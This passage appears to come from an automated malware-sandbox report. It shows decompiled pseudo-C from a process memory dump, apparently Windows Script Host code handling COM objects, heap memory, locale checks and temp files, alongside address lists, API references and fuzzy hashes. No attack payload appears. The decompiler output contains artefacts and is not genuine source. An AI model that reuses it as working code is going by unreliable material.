								 *((intOrPtr*)( *_t78 + 8))(_t78);
								L43:
								if(_t124 >= 0) {
									if(_v560 == 0 || E00B91945(_v556,  &_v544, _v560) >= 0) {
										 *_v564 = _v556;
										_t71 = 0;
									} else {
										 *((intOrPtr*)( *_v556 + 8))();
										E00B8F55F(_t119, E00B8160C, L"WScript.CreateObject", 0xc1e, _v556);
										_t71 = 0x80020009;
									}
									goto L49;
								}
								L44:
								_t71 = _t124;
								goto L49;
							}
							_t94 = _v548;
							_t119 =  &_v552;
							_t121 =  *((intOrPtr*)( *_t94))(_t94, E00B91D60,  &_v552);
							if(_t121 >= 0) {
								_t96 = _v552;
								_t124 =  *((intOrPtr*)( *_t96 + 0x14))(_t96, _t123, 2);
								_t98 = _v552;
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								if(_t124 >= 0) {
									goto L18;
								}
								_t70 = _v548;
								L38:
								 *((intOrPtr*)( *_t70 + 8))(_t70);
								goto L44;
							}
							_t90 = _v548;
							L23:
							 *((intOrPtr*)( *_t90 + 8))(_t90);
							L24:
							_t71 = _t121;
							goto L49;
						}
					}
				}
				_t71 = 0x80004003;
				goto L50;
			}



































                                                        0x00b91aa2
                                                        0x00b91aad
                                                        0x00b91ab4
                                                        0x00b91ab7
                                                        0x00b91aba
                                                        0x00b91abd
                                                        0x00b91ac4
                                                        0x00b91ac7
                                                        0x00b91acd
                                                        0x00b91ad5
                                                        0x00b91ae3
                                                        0x00b91aea
                                                        0x00b91aea
                                                        0x00b91aee
                                                        0x00b91af5
                                                        0x00b91af5
                                                        0x00b91afb
                                                        0x00b91afe
                                                        0x00b91bab
                                                        0x00b91bad
                                                        0x00b91bb9
                                                        0x00b91bc1
                                                        0x00b91bc7
                                                        0x00b91bcd
                                                        0x00b91bd1
                                                        0x00b91bed
                                                        0x00b91bf3
                                                        0x00b91bfa
                                                        0x00b91c2f
                                                        0x00b91c33
                                                        0x00b91c4b
                                                        0x00b91c58
                                                        0x00000000
                                                        0x00b91c58
                                                        0x00b91c35
                                                        0x00000000
                                                        0x00b91c06
                                                        0x00b91c0f
                                                        0x00b91c5e
                                                        0x00b91c5e
                                                        0x00b91c62
                                                        0x00b91c68
                                                        0x00b91c9c
                                                        0x00b91c9e
                                                        0x00b91ca3
                                                        0x00b91ca3
                                                        0x00b91ca6
                                                        0x00b91cae
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91cae
                                                        0x00b91c6c
                                                        0x00b91c83
                                                        0x00b91c8b
                                                        0x00b91c8d
                                                        0x00b91c8d
                                                        0x00b91c94
                                                        0x00b91c9a
                                                        0x00b91cba
                                                        0x00b91cc5
                                                        0x00b91cc7
                                                        0x00b91ccf
                                                        0x00b91cd4
                                                        0x00b91cd4
                                                        0x00b91cd7
                                                        0x00b91cdf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91c9a
                                                        0x00b91bfa
                                                        0x00b91bd3
                                                        0x00b91bdb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91bdb
                                                        0x00b91baf
                                                        0x00000000
                                                        0x00b91b04
                                                        0x00b91b07
                                                        0x00b91b09
                                                        0x00b91b09
                                                        0x00b91b0d
                                                        0x00000000
                                                        0x00b91b13
                                                        0x00b91b29
                                                        0x00b91d4d
                                                        0x00b91d4d
                                                        0x00b91d4e
                                                        0x00b91d5b
                                                        0x00b91d5b
                                                        0x00b91b31
                                                        0x00b91b87
                                                        0x00b91b87
                                                        0x00b91b8f
                                                        0x00b91b9e
                                                        0x00b91ba0
                                                        0x00b91ce1
                                                        0x00b91ce4
                                                        0x00b91ce7
                                                        0x00b91ce9
                                                        0x00b91cf5
                                                        0x00b91d49
                                                        0x00b91d4b
                                                        0x00b91d13
                                                        0x00b91d1c
                                                        0x00b91d2e
                                                        0x00b91d36
                                                        0x00b91d36
                                                        0x00000000
                                                        0x00b91cf5
                                                        0x00b91ceb
                                                        0x00b91ceb
                                                        0x00000000
                                                        0x00b91ceb
                                                        0x00b91b33
                                                        0x00b91b3b
                                                        0x00b91b4a
                                                        0x00b91b4e
                                                        0x00b91b5b
                                                        0x00b91b6a
                                                        0x00b91b6c
                                                        0x00b91b75
                                                        0x00b91b7a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91b7c
                                                        0x00b91cb0
                                                        0x00b91cb3
                                                        0x00000000
                                                        0x00b91cb3
                                                        0x00b91b50
                                                        0x00b91bdd
                                                        0x00b91be0
                                                        0x00b91be3
                                                        0x00b91be3
                                                        0x00000000
                                                        0x00b91be3
                                                        0x00b91b0d
                                                        0x00b91afe
                                                        0x00b91ad7
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WScript.CreateObject
                                                        • API String ID: 0-1366894974
                                                        • Opcode ID: 2d5e8fd1952342a791778f9a3d464fb519ae27d746830720c2c600874494aef2
                                                        • Instruction ID: 49414662d1795c0773a6e929972ed0b47f940d63ce0f2bed879d1c7a8734a454
                                                        • Opcode Fuzzy Hash: 2d5e8fd1952342a791778f9a3d464fb519ae27d746830720c2c600874494aef2
                                                        • Instruction Fuzzy Hash: CA813275A4111AABCF20EFA8DCC8AA9B7F9EB48304F1449F9E506EB251D6309D81DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B818C4, Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B818C4(void** __ecx, void* _a4) {
				void* _t5;
				void* _t8;
				void* _t11;
				void** _t20;

				_t20 = __ecx;
				_t5 =  *__ecx;
				if(_t5 != 0) {
					HeapFree(GetProcessHeap(), 0, _t5);
				}
				_t8 = _a4;
				_t20[2] = _t8;
				_t11 = HeapAlloc(GetProcessHeap(), 0, _t8 + _t8);
				_t20[1] = _t20[1] & 0x00000000;
				 *_t20 = _t11;
				if(_t11 == 0) {
					return 0x8007000e;
				} else {
					 *_t11 = 0;
					return 0;
				}
			}







                                                        0x00b818ca
                                                        0x00b818cc
                                                        0x00b818d7
                                                        0x00b8929f
                                                        0x00b8929f
                                                        0x00b818dd
                                                        0x00b818e0
                                                        0x00b818eb
                                                        0x00b818f1
                                                        0x00b818f6
                                                        0x00b818fb
                                                        0x00000000
                                                        0x00b81901
                                                        0x00b81903
                                                        0x00000000
                                                        0x00b81906

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • GetProcessHeap.KERNEL32(00000000), ref: 00B8929C
                                                        • HeapFree.KERNEL32(00000000), ref: 00B8929F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 3808df90cf18bef96645af1d5f40e4d92ca70e3e9fe359c4ac521857d787e219
                                                        • Instruction ID: 6d64e01f3a601c7b34790808c90fb3401665000924ae38efec590b1662b0f76f
                                                        • Opcode Fuzzy Hash: 3808df90cf18bef96645af1d5f40e4d92ca70e3e9fe359c4ac521857d787e219
                                                        • Instruction Fuzzy Hash: CBF0B471605304ABD7206FAEDC09F2377DCDF90321F10486AF445C7160DA74D841CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9041E, Relevance: 4.6, APIs: 3, Instructions: 113memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 55%
                                                        			E00B9041E(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				void* _v84;
				void* _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				char* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr* _t53;
				intOrPtr _t54;
				intOrPtr* _t55;
				intOrPtr _t56;
				intOrPtr* _t59;
				signed int _t72;

				_t39 =  *0xb97004; // 0xbb40e64e
				_v8 = _t39 ^ _t72;
				_t59 = _a4;
				_v96 = _a8;
				_t42 =  &_v88;
				_v100 = __ecx;
				_v88 = 0;
				_v84 = 0;
				_v92 = 0;
				__imp__CreateBindCtx(0, _t42);
				_t71 = _t42;
				if(_t42 < 0) {
					L11:
					__imp__#6(_v92);
					_t43 = _v84;
					if(_t43 != 0) {
						 *((intOrPtr*)( *_t43 + 8))(_t43);
					}
					_t44 = _v88;
					if(_t44 != 0) {
						 *((intOrPtr*)( *_t44 + 8))(_t44);
					}
					return E00B81335(_t71, _t59, _v8 ^ _t72, _t69, 0, _t71);
				}
				_t49 = _v88;
				_t69 =  &_v116;
				_v116 = 0x10;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_t50 =  *((intOrPtr*)( *_t49 + 0x18))(_t49,  &_v116);
				_t71 = _t50;
				if(_t50 < 0) {
					goto L11;
				}
				_t52 =  *((intOrPtr*)( *_t59 + 0x24))(_t59, _v88, 0, E00B90538,  &_v84);
				_t71 = _t52;
				if(_t52 < 0) {
					goto L11;
				}
				_t53 = _v84;
				_t69 =  &_v80;
				_t54 =  *((intOrPtr*)( *_t53 + 0x30))(_t53,  &_v80, 1);
				_t71 = _t54;
				if(_t54 < 0) {
					goto L11;
				}
				if(_v68 != 0) {
					L6:
					_t71 = 0x8007000e;
					goto L11;
				}
				_t59 = _v72;
				__imp__#150(0, _t59);
				_v92 = _t54;
				if(_t54 != 0) {
					_t55 = _v84;
					_t68 =  *_t55;
					_t56 =  *((intOrPtr*)( *_t55 + 0xc))(_t55, _v92, _t59, 0);
					_t71 = _t56;
					__eflags = _t56;
					if(__eflags >= 0) {
						if(__eflags == 0) {
							_t71 = E00B857A1(_t68,  *((intOrPtr*)(_v100 + 0x18)), _v92, _t59, _v96);
						} else {
							_t71 = 0x80004005;
						}
					}
					goto L11;
				}
				goto L6;
			}
































                                                        0x00b90426
                                                        0x00b9042d
                                                        0x00b90434
                                                        0x00b90439
                                                        0x00b9043e
                                                        0x00b90443
                                                        0x00b90446
                                                        0x00b90449
                                                        0x00b9044c
                                                        0x00b9044f
                                                        0x00b90455
                                                        0x00b90459
                                                        0x00b904ff
                                                        0x00b90502
                                                        0x00b90508
                                                        0x00b9050d
                                                        0x00b90512
                                                        0x00b90512
                                                        0x00b90515
                                                        0x00b9051a
                                                        0x00b9051f
                                                        0x00b9051f
                                                        0x00b90532
                                                        0x00b90532
                                                        0x00b9045f
                                                        0x00b90462
                                                        0x00b90466
                                                        0x00b9046d
                                                        0x00b90470
                                                        0x00b90473
                                                        0x00b90479
                                                        0x00b9047c
                                                        0x00b90480
                                                        0x00000000
                                                        0x00000000
                                                        0x00b90492
                                                        0x00b90495
                                                        0x00b90499
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9049b
                                                        0x00b904a2
                                                        0x00b904a7
                                                        0x00b904aa
                                                        0x00b904ae
                                                        0x00000000
                                                        0x00000000
                                                        0x00b904b3
                                                        0x00b904c7
                                                        0x00b904c7
                                                        0x00000000
                                                        0x00b904c7
                                                        0x00b904b5
                                                        0x00b904ba
                                                        0x00b904c0
                                                        0x00b904c5
                                                        0x00b904ce
                                                        0x00b904d1
                                                        0x00b904d9
                                                        0x00b904dc
                                                        0x00b904de
                                                        0x00b904e0
                                                        0x00b904e2
                                                        0x00b904fd
                                                        0x00b904e4
                                                        0x00b904e4
                                                        0x00b904e4
                                                        0x00b904e2
                                                        0x00000000
                                                        0x00b904e0
                                                        0x00000000

                                                        APIs
                                                        • CreateBindCtx.OLE32(00000000,?), ref: 00B9044F
                                                        • SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 00B904BA
                                                          • Part of subcall function 00B857A1: IsTextUnicode.ADVAPI32(?,00000000,?), ref: 00B857E0
                                                          • Part of subcall function 00B857A1: MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00B904FD,?,?), ref: 00B85804
                                                          • Part of subcall function 00B857A1: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B85817
                                                          • Part of subcall function 00B857A1: MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00B904FD,?,?), ref: 00B8583B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B90502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteString$AllocCharMultiWide$BindCreateFreeTextUnicode
                                                        • String ID:
                                                        • API String ID: 2083688437-0
                                                        • Opcode ID: de631e3d476ef757412b9fbb4c837aa5c34ad4b3dbc26fb81f065d800dc4a037
                                                        • Instruction ID: d1c8180e5c21c5cd654789e0051a019385ae64e2b9200dae3388f7baa2e229a8
                                                        • Opcode Fuzzy Hash: de631e3d476ef757412b9fbb4c837aa5c34ad4b3dbc26fb81f065d800dc4a037
                                                        • Instruction Fuzzy Hash: 4941FB759002689FCB11EFE8C88889DFBF9EF98310B2545A9EA16EB314D7719C41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8719A, Relevance: 3.1, APIs: 2, Instructions: 73comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E00B8719A(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				intOrPtr* _t14;
				char* _t15;
				char* _t18;
				intOrPtr* _t19;
				intOrPtr* _t21;
				char* _t36;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t45;

				_t14 = _a8;
				if(_t14 == 0) {
					_t15 = 0x80004003;
				} else {
					_t39 = _a4 + 0x3c;
					 *_t14 = 0;
					if( *_t39 != 0) {
						L9:
						 *_t14 =  *_t39;
						_t40 =  *_t39;
						 *((intOrPtr*)( *_t40 + 4))(_t40);
						_t15 = 0;
					} else {
						_t18 =  &_v8;
						_v8 = 0;
						__imp__CoCreateInstance(E00B873E0, 0, 1, E00B8749C, _t18);
						_t36 = _t18;
						if(_t36 < 0) {
							L13:
							_t15 = _t36;
						} else {
							_t45 =  *0xb97001; // 0x0
							if(_t45 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x40)) + 0x25)) == 0 && E00B819AE(GetStdHandle(0xfffffff4)) == 0) {
								_push(_t39);
								_push(0);
							} else {
								_push(_t39);
								_push(1);
							}
							_t19 = _v8;
							_t36 =  *((intOrPtr*)( *_t19 + 0x80))(_t19, 2);
							_t21 = _v8;
							 *((intOrPtr*)( *_t21 + 8))(_t21);
							if(_t36 < 0) {
								goto L13;
							} else {
								_t14 = _a8;
								goto L9;
							}
						}
					}
				}
				return _t15;
			}













                                                        0x00b871a0
                                                        0x00b871a8
                                                        0x00b88f6c
                                                        0x00b871ae
                                                        0x00b871b2
                                                        0x00b871b5
                                                        0x00b871ba
                                                        0x00b87223
                                                        0x00b87225
                                                        0x00b87227
                                                        0x00b8722c
                                                        0x00b8722f
                                                        0x00b871bc
                                                        0x00b871bc
                                                        0x00b871cd
                                                        0x00b871d0
                                                        0x00b871d6
                                                        0x00b871da
                                                        0x00b8723d
                                                        0x00b8723d
                                                        0x00b871dc
                                                        0x00b871dc
                                                        0x00b871e2
                                                        0x00b87201
                                                        0x00b87202
                                                        0x00b87238
                                                        0x00b87238
                                                        0x00b87239
                                                        0x00b87239
                                                        0x00b87203
                                                        0x00b87211
                                                        0x00b87213
                                                        0x00b87219
                                                        0x00b8721e
                                                        0x00000000
                                                        0x00b87220
                                                        0x00b87220
                                                        0x00000000
                                                        0x00b87220
                                                        0x00b8721e
                                                        0x00b871da
                                                        0x00b87232
                                                        0x00b87235

                                                        APIs
                                                        • CoCreateInstance.OLE32(00B873E0,00000000,00000001,00B8749C,?), ref: 00B871D0
                                                        • GetStdHandle.KERNEL32(000000F4), ref: 00B871F1
                                                          • Part of subcall function 00B819AE: GetConsoleMode.KERNEL32 ref: 00B819BA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ConsoleCreateHandleInstanceMode
                                                        • String ID:
                                                        • API String ID: 733827414-0
                                                        • Opcode ID: f0f9490c840ab5e014f2c43e381bad54fee904a936d68e0b8788c84279e6d634
                                                        • Instruction ID: 16a3944cfd3c432a028f5b80b170609c8da46b5d6ae7c989f462f8cef3c5df9b
                                                        • Opcode Fuzzy Hash: f0f9490c840ab5e014f2c43e381bad54fee904a936d68e0b8788c84279e6d634
                                                        • Instruction Fuzzy Hash: 9621A271688204AFC710EF98CCC4D5ABBE9EF5A358B2544A8F945DB271CA31DD41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B941BC, Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00B941BC() {
				signed int _v8;
				long _v72;
				void* __esi;
				signed int _t5;
				signed int _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t22;

				_t5 =  *0xb97004; // 0xbb40e64e
				_v8 = _t5 ^ _t22;
				_t18 = 0xc04;
				if(GetLocaleInfoW(0x404, 8,  &_v72, 0x20) != 0) {
					_t12 = wcsncmp( &_v72, 0xb94220, 3);
					asm("sbb esi, esi");
					_t18 = ( ~_t12 & 0xfffff800) + 0xc04;
				}
				return E00B81335(_t18, _t13, _v8 ^ _t22, _t16, _t17, _t18);
			}













                                                        0x00b941c4
                                                        0x00b941cb
                                                        0x00b941dc
                                                        0x00b941e9
                                                        0x00b941f6
                                                        0x00b94202
                                                        0x00b9420a
                                                        0x00b9420a
                                                        0x00b9421f

                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000008), ref: 00B941E1
                                                        • wcsncmp.MSVCRT(?,00B94220,00000003), ref: 00B941F6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: InfoLocalewcsncmp
                                                        • String ID:
                                                        • API String ID: 4128031126-0
                                                        • Opcode ID: c852dd89c7ead89ffe768bf52a579fb8143f159f1c9d5451d36fa62a5f8c4984
                                                        • Instruction ID: 2e958128d77d9e50e815a0ecfab7d41261b7eed4892043549de0d8966b15c223
                                                        • Opcode Fuzzy Hash: c852dd89c7ead89ffe768bf52a579fb8143f159f1c9d5451d36fa62a5f8c4984
                                                        • Instruction Fuzzy Hash: 26F089B2E5025867EF10D7649D06F5E72ECE744714F050170BA41AB2D1DA60AE05C799
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8587A, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B8587A() {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				signed int _t8;
				signed int _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t8 =  *0xb97004; // 0xbb40e64e
				_v8 = _t8 ^ _t21;
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) == 0) {
					_t12 = 0;
				} else {
					_t12 = 0 | _v156.dwPlatformId == 0x00000002;
				}
				return E00B81335(_t12, _t15, _v8 ^ _t21, _t18, _t19, _t20);
			}












                                                        0x00b85885
                                                        0x00b8588c
                                                        0x00b85896
                                                        0x00b858a8
                                                        0x00b885f7
                                                        0x00b858ae
                                                        0x00b858b7
                                                        0x00b858b7
                                                        0x00b858c5

                                                        APIs
                                                        • GetVersionExA.KERNEL32(?), ref: 00B858A0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Version
                                                        • String ID:
                                                        • API String ID: 1889659487-0
                                                        • Opcode ID: ef00fb002ccd571dc0a30296180c0bb6b98a63eded316966de56fd56173c989f
                                                        • Instruction ID: fd53f6e9edbdaf4fcca1b7fb9e374a8a1cc548cb4df56b4c041ab704254b34ee
                                                        • Opcode Fuzzy Hash: ef00fb002ccd571dc0a30296180c0bb6b98a63eded316966de56fd56173c989f
                                                        • Instruction Fuzzy Hash: F9E09A31600208ABCB60EF38DA4679EB7F8AB06300F9044E9900ED7292DE349A89DB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B93F69, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B93F69(struct HINSTANCE__* _a4) {
				struct HRSRC__* _t3;

				_t3 = E00B93F3E(_a4, 0);
				if(_t3 != 0) {
					return LoadResource(_a4, _t3);
				}
				return _t3;
			}




                                                        0x00b93f73
                                                        0x00b93f7a
                                                        0x00000000
                                                        0x00b93f80
                                                        0x00b93f87

                                                        APIs
                                                          • Part of subcall function 00B93F3E: FindResourceExW.KERNEL32(?,MUI,00000001,00B948D9,?,00B948D9,?,00000000), ref: 00B93F50
                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00B93FA9,00000000,?,?,00B946FD,00000000,00000000,00000000,00000000,00000008,?), ref: 00B93F80
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Resource$FindLoad
                                                        • String ID:
                                                        • API String ID: 2619053042-0
                                                        • Opcode ID: bf1394402e26312faf6408a1059b4a4d7c3f127c2e5d4ac734edbfe77aa0f4c2
                                                        • Instruction ID: 015080d8abcdb66d36ae0bc050f8c994542b0fb69ea010bce36999b1a01378d7
                                                        • Opcode Fuzzy Hash: bf1394402e26312faf6408a1059b4a4d7c3f127c2e5d4ac734edbfe77aa0f4c2
                                                        • Instruction Fuzzy Hash: D8C0123140414877DF111F12DC05F963EEDDB50B90F004030BA0485060DB31DD51D554
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B85AD1, Relevance: 1.3, APIs: 1, Instructions: 34stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B85AD1(signed int __eax, WCHAR* __ebx, signed int __ecx, WCHAR** __edi, intOrPtr _a4, intOrPtr* _a8) {
				WCHAR* _t24;
				WCHAR* _t28;
				signed int _t30;
				intOrPtr* _t34;
				WCHAR* _t36;
				WCHAR** _t42;
				signed int _t45;
				void* _t46;

				_t42 = __edi;
				_t36 = __ebx;
				asm("insd");
				asm("a16 and al, 0x42");
				asm("ficom dword [edi]");
				if((__ecx & __eax) <= 0) {
					if(__eax + 0xb973f0 == 0) {
						L12:
						_t24 = 0;
					} else {
						do {
							_t45 = lstrlenW( *_t42);
							if(E00B82753( *_t42, _t36, _t45) == 0) {
								_t6 =  &(_t42[2]); // 0x0
								_t38 = 0;
								_t28 =  *_t6;
								if(_t28 != 0) {
									if(_t28 != 1) {
										goto L12;
									} else {
										_t30 =  *(_t36 + _t45 * 2) & 0x0000ffff;
										if(_t30 != 0x3a) {
											L18:
											if(_t30 == _t38) {
												goto L21;
											} else {
												_t42 =  &(_t42[3]);
												goto L5;
											}
										} else {
											if( *((intOrPtr*)(_t36 + 2 + _t45 * 2)) != 0) {
												_t19 = _t45 * 2; // 0x80000005
												 *_a8 = _t36 + _t19 + 2;
												goto L9;
											} else {
												if(_t30 == _t30) {
													L21:
													 *_a8 = _t38;
													goto L9;
												} else {
													goto L18;
												}
											}
										}
									}
									goto L23;
								} else {
									if( *(_t36 + _t45 * 2) != 0) {
										_t24 = 0x3a;
									} else {
										L9:
										_t9 =  &(_t42[1]); // 0x42
										_t24 =  *_t9;
									}
								}
							} else {
								_t42 =  &(_t42[3]);
								_t38 = 0;
								goto L5;
							}
							goto L10;
							L5:
						} while ( *_t42 != _t38);
						goto L12;
					}
					L10:
					return _t24;
				} else {
					_a4 = _a4 - 0xc;
					_t34 =  *((intOrPtr*)(_a4 + 0x10));
					return  *((intOrPtr*)( *_t34 + 4))(_t34, _t46);
				}
				L23:
			}











                                                        0x00b85ad1
                                                        0x00b85ad1
                                                        0x00b85ad3
                                                        0x00b85ad4
                                                        0x00b85add
                                                        0x00b85adf
                                                        0x00b85a76
                                                        0x00b85aba
                                                        0x00b85aba
                                                        0x00b85a78
                                                        0x00b85a78
                                                        0x00b85a80
                                                        0x00b85a8d
                                                        0x00b85a9a
                                                        0x00b85a9d
                                                        0x00b85a9f
                                                        0x00b85aa1
                                                        0x00b878ef
                                                        0x00000000
                                                        0x00b878f5
                                                        0x00b878f5
                                                        0x00b878fd
                                                        0x00b8790b
                                                        0x00b8790e
                                                        0x00000000
                                                        0x00b87910
                                                        0x00b87910
                                                        0x00000000
                                                        0x00b87910
                                                        0x00b878ff
                                                        0x00b87904
                                                        0x00b8791b
                                                        0x00b8791f
                                                        0x00000000
                                                        0x00b87906
                                                        0x00b87909
                                                        0x00b87926
                                                        0x00b87929
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87909
                                                        0x00b87904
                                                        0x00b878fd
                                                        0x00000000
                                                        0x00b85aa7
                                                        0x00b85aab
                                                        0x00b87932
                                                        0x00b85ab1
                                                        0x00b85ab1
                                                        0x00b85ab1
                                                        0x00b85ab1
                                                        0x00b85ab1
                                                        0x00b85aab
                                                        0x00b85a8f
                                                        0x00b85a8f
                                                        0x00b85a92
                                                        0x00000000
                                                        0x00b85a92
                                                        0x00000000
                                                        0x00b85a94
                                                        0x00b85a94
                                                        0x00000000
                                                        0x00b85a98
                                                        0x00b85ab4
                                                        0x00b85ab7
                                                        0x00b85ae5
                                                        0x00b85ae5
                                                        0x00b81ef5
                                                        0x00b81eff
                                                        0x00b81eff
                                                        0x00000000

                                                        APIs
                                                        • lstrlenW.KERNEL32(00B973F0,80000001,?,?,00B859F3,00B83C8C,80000001,?,?), ref: 00B85A7A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID:
                                                        • API String ID: 1659193697-0
                                                        • Opcode ID: 839cc73d04c8ffc001fb506cbafa697eba2f5b1db07b13f144f101dc999c5a40
                                                        • Instruction ID: 1a781a804536e800d13627f078bd2a9dfdf89fac2e8ed2a0f9bc9345372b59e4
                                                        • Opcode Fuzzy Hash: 839cc73d04c8ffc001fb506cbafa697eba2f5b1db07b13f144f101dc999c5a40
                                                        • Instruction Fuzzy Hash: 45E09B36645512DFDB387A24C4C8076B7E9EB553A17248AB2ECC196130DB31CC11D755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B90E17, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 242filememoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B90E17(int _a4, int _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				int _v12;
				CHAR* _v16;
				void _v20;
				long _v24;
				long _v28;
				intOrPtr* _t61;
				long _t62;
				signed int _t63;
				CHAR* _t66;
				CHAR* _t67;
				void* _t69;
				signed int _t70;
				intOrPtr* _t74;
				int _t75;
				short* _t76;
				signed int _t79;
				intOrPtr* _t90;
				signed int _t94;
				char* _t96;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				int _t113;
				signed int _t116;
				CHAR* _t118;
				void* _t119;

				 *_a16 = 0;
				_t61 = _a20;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0xfeff;
				if(_t61 != 0) {
					 *_t61 = 0;
				}
				if(_a4 == 0) {
					L7:
					_t62 = GetTempPathA(0, 0);
					if(_t62 == 0) {
						L4:
						_t63 = GetLastError();
						if(_t63 > 0) {
							_t63 = _t63 & 0x0000ffff | 0x80070000;
						}
						_t116 = _t63;
						L52:
						return _t116;
					}
					_t66 = _t62 + 1;
					_push(_t66);
					_v24 = _t66;
					L00B82877();
					_v16 = _t66;
					if(_t66 != 0) {
						_t67 = GetTempPathA(_v24, _t66);
						if(_t67 != 0) {
							_t14 = _v12 + 0xf; // 0xf
							_t118 =  &(_t67[_t14]);
							_push(_t118);
							L00B82877();
							_v12 = _t67;
							if(_t67 != 0) {
								if(GetTempFileNameA(_v16, ?str?, 0, _t67) != 0) {
									if(_a4 == 0) {
										L24:
										_t69 = CreateFileA(_v12, 0xc0000000, 0, 0, 2, 0x4002100, 0);
										_v8 = _t69;
										if(_t69 == 0xffffffff) {
											_v8 = 0;
										}
										if(_v8 == 0) {
											goto L17;
										} else {
											_t112 = _a12;
											if(_t112 <= 0) {
												L32:
												if(_a20 == 0) {
													L43:
													_a4 = 0;
													 *_a16 = _v8;
													_v8 = 0;
													_t116 = 0;
													L44:
													if(_a4 != 0) {
														__imp__#6(_a4);
													}
													L46:
													if(_v12 != 0) {
														_push(_v12);
														L00B82082();
													}
													L48:
